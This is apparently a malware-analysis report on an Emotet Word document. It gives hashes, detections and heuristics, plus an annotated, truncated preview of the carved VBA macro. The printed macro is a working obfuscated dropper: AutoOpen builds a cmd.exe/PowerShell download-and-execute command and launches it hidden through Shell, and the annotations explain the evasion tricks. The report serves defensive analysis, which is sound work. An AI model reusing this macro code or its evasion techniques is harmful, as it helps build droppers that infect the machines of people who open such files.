Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 05b899ee1ae0dd61…

MALICIOUS

Office (OLE)

100.9 KB Created: 2018-09-21 19:37:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 82546c37ed38fa5611256399da479cf7 SHA-1: d388c0242fbe0a92055a61ceb6196d2f33a02ede SHA-256: 05b899ee1ae0dd6107effcc22880e75ccf90aee68df3ace9936d1cd17b518c9f
142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883993-0'. Static analysis recovered a VBA project whose AutoOpen subroutine runs as soon as the document is opened with macros enabled, a hallmark of Emotet maldocs. AutoOpen concatenates a command line from Word's KeyString(67) and several string-returning helper functions, then hands it to Shell with a window-style argument that evaluates to 0 (vbHide), i.e. a hidden window. The recovered macro source contains fragments such as "md /V:/C" together with caret-split strings that read as reversed PowerShell tokens (DownloadFile, catch/break, an Invoke-* cmdlet), consistent with a cmd.exe → PowerShell download-and-execute stage. The second-stage URLs are assembled at runtime from these obfuscated fragments and are not present in cleartext, so no C2 indicators should be taken from this static pass alone.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6883993-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6883993-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: the "no modern VBA project was recovered" wording of this heuristic conflicts with the OLE_VBA_MACROS and OLE_VBA_AUTOOPEN findings above and with the 12,275-byte VBA source carved below; treat the recovered VBA project as the authoritative finding and this marker as a redundant, lower-fidelity signal.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace identifier carried by embedded drawing parts, not a network indicator and not a download location. The URLs the macro actually contacts are built at runtime by the obfuscated string-building functions and are not recoverable from this static extraction.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12275 bytes
SHA-256: cc2d53435c832fa7f0d0846ae6771f7e6a9438a6efde932349d68bc866bf042c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FNjkwjjBwR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as emitted by olevba for the first VBA module of the project.
' VB_Base = "1Normal.ThisDocument" with VB_PredeclaredId = True identifies this
' as the document's own ThisDocument module, so the AutoOpen routine that
' follows ships inside the file itself (not in a referenced template) and fires
' when the document is opened with macros enabled. The random VB_Name is typical
' of generated/obfuscated maldoc projects.
' Auto-executing entry point: Word runs AutoOpen when the document is opened
' with macros enabled (ATT&CK T1204.002 -> T1059.005).
' Nearly every statement is filler: each Dim'd array is assigned exactly once
' from Right/Left/MidB with a length or start position that exceeds the
' literal's length (e.g. Right("qWGWbU", 116) returns the whole literal,
' MidB("sLCfpbTX", 746, 399) returns ""), and none of these arrays is read
' again anywhere in this routine. The only operative statement is the
' QaEzjBk(...) call in the middle of the body.
Sub AutoOpen()
   Dim QWfNuL(1)
QWfNuL(0) = Right("qWGWbU", 116)

   Dim oXdoXp(1)
oXdoXp(0) = MidB("sLCfpbTX", 746, 399)

   Dim Yvkrwc(1)
Yvkrwc(0) = MidB("EDEFk", 568, 648)

   Dim Maptum(2)
Maptum(0) = MidB("jlGnvCzR", 667, 675)
Maptum(1) = MidB("DLHkG", 352, 127)

   Dim HwctRv(2)
HwctRv(0) = Right("JhEIjjkc", 345)
HwctRv(1) = Left("jnRJwLFc", 536)

   Dim IPmcBi(1)
IPmcBi(0) = MidB("BcKjsh", 618, 175)

   Dim WcSizK(1)
WcSizK(0) = MidB("AMDhr", 265, 354)

   Dim ScjhTP(1)
ScjhTP(0) = Right("RIaajK", 871)

   Dim AOrTuu(2)
AOrTuu(0) = Right("idZZdL", 166)
AOrTuu(1) = MidB("uclLjH", 842, 619)

' The real work. The command line is KeyString(67) followed by the return
' values of five string-building helpers, and is passed to QaEzjBk, which
' feeds it to Shell. 3+3+3+11+47 = 67 is the virtual-key code for 'C', so
' Application.KeyString(67) is expected to yield "c"; uRaLPw (the next
' fragment, defined in the second module) starts with "md /V:/C", which
' together gives `cmd /V:/C"...` -- cmd.exe with delayed variable expansion
' and a quoted command. mcTlPjqNjR, fEljvtStCO, KOrrJZhjofbn and
' sBdUcbPwdfaZLn are not in the recovered preview; presumably they supply the
' remaining caret-split, reversed PowerShell fragments seen in uRaLPw.
' NOTE(review): KeyString(67) = "c" is the usual reading for this family --
' confirm by sandbox execution before quoting the full command line.
QaEzjBk (KeyString(3 + 3 + 3 + 11 + 47) + uRaLPw + mcTlPjqNjR + fEljvtStCO + KOrrJZhjofbn + sBdUcbPwdfaZLn)
   Dim kMQkN(1)
kMQkN(0) = Right("JXpVakaD", 706)

   Dim pGNYW(2)
pGNYW(0) = Right("QoWLulEE", 226)
pGNYW(1) = Left("BwSDzHN", 977)

   Dim QjiuZT(1)
QjiuZT(0) = Right("YMUTRitP", 43)

End Sub
' Executes the command line assembled by AutoOpen.
' haswlBEtmE: the fully concatenated command string (passed ByVal via the
'             parenthesised call in AutoOpen).
' Returns: nothing useful -- the function never assigns its own name, so the
'          caller receives an empty Variant; the Shell call is the sole effect.
' The surrounding Dim/Right/Mid/MidB assignments are the same dead-store filler
' as in AutoOpen: every length/offset exceeds the literal's length, so each
' call yields either the whole literal or "", and no array is read afterwards.
Function QaEzjBk(haswlBEtmE As String)
   Dim RrQLtS(2)
RrQLtS(0) = MidB("AZpGH", 538, 213)
RrQLtS(1) = MidB("PwjPLTj", 45, 279)

   Dim YmzAc(1)
YmzAc(0) = Right("PqDQYPS", 211)

' Shell launches haswlBEtmE as a new process. The trailing "@" is a VBA
' type-declaration character glued onto the keyword, presumably to defeat
' naive "Shell " pattern matches. The window-style argument is
' CInt(msoBarTypeNormal): that Office constant is 0, the same value as vbHide,
' so the spawned cmd.exe window is hidden from the user.
Shell@ haswlBEtmE, CInt(msoBarTypeNormal)
   Dim IoFAGY(2)
IoFAGY(0) = Right("zKusKGaw", 517)
IoFAGY(1) = Mid("ZHOshIQ", 732, 905)

   Dim PdiYQ(2)
PdiYQ(0) = Right("iwZMOfwf", 833)
PdiYQ(1) = Mid("NsEaWjPY", 526, 150)

   Dim OCafo(2)
OCafo(0) = MidB("LZULVs", 827, 880)
OCafo(1) = Mid("WkGzYYj", 577, 191)

   Dim PlMFj(2)
PlMFj(0) = MidB("NzCUdj", 609, 509)
PlMFj(1) = MidB("JKCCbPca", 296, 741)

   Dim lpCBQX(2)
lpCBQX(0) = MidB("MUpAj", 596, 270)
lpCBQX(1) = Mid("UGWJlW", 104, 307)

End Function

Attribute VB_Name = "nKzThGzWXwMoBb"
' Start of the project's second module. uRaLPw, the first string-building
' helper that AutoOpen concatenates into its command line, is defined here;
' its body (and the rest of this module) runs past the end of the preview, so
' only the leading fragments ("md /V:/C", caret-split reversed PowerShell
' pieces) are visible in this extraction.
Function uRaLPw()
Dim lHnwTZ(1)
lHnwTZ(0) = MidB("PRYzK", 649, 77)

   Dim ZEIhI(1)
ZEIhI(0) = Mid("SRFwQM", 243, 971)

   Dim dSrVF(2)
dSrVF(0) = MidB("AGQYMhQZ", 363, 406)
dSrVF(1) = Mid("tNCXVN", 891, 268)

   Dim izoTCk(2)
izoTCk(0) = Right("ImGfCVNj", 18)
izoTCk(1) = Mid("iYzJSSXt", 685, 296)

zTNFG = "md /" + "V:" + "/C" + ChrW(0 + 0 + 5 + 4 + 25) + "s" + "^" + "et" + " ^tB" + "=" + "^  " + "  ^" + " ^" + " "
Dim wXjfw(2)
wXjfw(0) = MidB("DcnciJ", 142, 243)
wXjfw(1) = Left("diiOHMbq", 771)

   Dim CoIPdr(2)
CoIPdr(0) = MidB("cwTjFs", 420, 92)
CoIPdr(1) = Left("JfnsHmj", 958)

   Dim HlAfiv(2)
HlAfiv(0) = Left("SlqsIFwH", 420)
HlAfiv(1) = MidB("Ozcbs", 153, 186)

PUsFRvwi = " ^" + "  ^" + " ^  " + "^" + " " + " ^" + " " + "  }}"
Dim AmhPH(1)
AmhPH(0) = MidB("FDwTn", 555, 726)

   Dim jBpIl(1)
jBpIl(0) = MidB("vFcYDDh", 694, 39)

   Dim CpVhvA(2)
CpVhvA(0) = MidB("UPUXw", 835, 764)
CpVhvA(1) = Right("OducpsC", 690)

XPICjAmaQkr = "{hc" + "^t^a" + "c" + "^}" + ";^" + "kae" + "r^b" + "^" + ";" + "^tZ" + "^Y^$" + " me"
Dim dMrEwU(2)
dMrEwU(0) = Mid("sLNpj", 608, 93)
dMrEwU(1) = Right("VCLmi", 593)

   Dim VNCCtb(1)
VNCCtb(0) = Mid("CJMcO", 581, 946)

   Dim WFrNb(2)
WFrNb(0) = Left("dFhFrEH", 469)
WFrNb(1) = MidB("uSiZOs", 851, 166)

   Dim wTlAkl(1)
wTlAkl(0) = MidB("LwKiKnd", 451, 869)

   Dim Kziba(2)
Kziba(0) = MidB("hjhPHzK", 26, 715)
Kziba(1) = Right("BJJrjlR", 430)

   Dim WuNbE(1)
WuNbE(0) = Mid("JSuvU", 833, 719)

VbMzjh = "t" + "^" + "I^" + "-e" + "^ko" + "vn" + "^I^" + ";)" + "^t^Z" + "Y" + "$^ "
Dim UYErU(2)
UYErU(0) = MidB("ckZVEt", 482, 663)
UYErU(1) = Left("XQcWO", 432)

   Dim LSKMA(1)
LSKMA(0) = Right("nhEOsdJ", 565)

ZKSpz = "^," + "^" + "i" + "^w^E" + "$(e" + "^l^" + "i^Fd" + "a" + "o^ln" + "w^o" + "^D^." + "P" + "P^"
Dim jNzmIi(2)
jNzmIi(0) = Right("sKlzMkow", 313)
jNzmIi(1) = Left("ivpCqvpo", 528)

   Dim YwPaqd(1)
YwPaqd(0) = MidB("JSpRS", 128, 598)

   Dim ZmfctI(1)
ZmfctI(0) = MidB("CUNhHT", 729, 346)

   Dim TAlHbu(1)
TAlHbu(0) = Left("ruvmNX", 944)

   Dim XUjUJ(1)

... (truncated)